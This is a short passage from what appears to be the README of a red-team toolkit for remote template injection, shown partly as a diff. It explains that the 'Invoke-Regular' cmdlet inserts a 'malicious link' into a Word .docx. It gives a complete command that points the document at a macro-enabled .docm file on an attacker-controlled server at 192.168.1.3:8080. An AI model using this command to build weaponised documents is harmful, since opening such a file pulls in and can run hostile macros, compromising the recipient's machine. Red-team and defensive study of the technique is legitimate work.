nickvourd/RTI-Toolkit/README.md

 ![Word Document](/Pictures/Word-Document.png)

 If you use `Invoke-Regular` cmdlet you can insert a malicious link within this docx:

+⚠️ Before running `Invoke-Regular`, please make sure to save the document and close it (terminate its process).

 ```
 Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx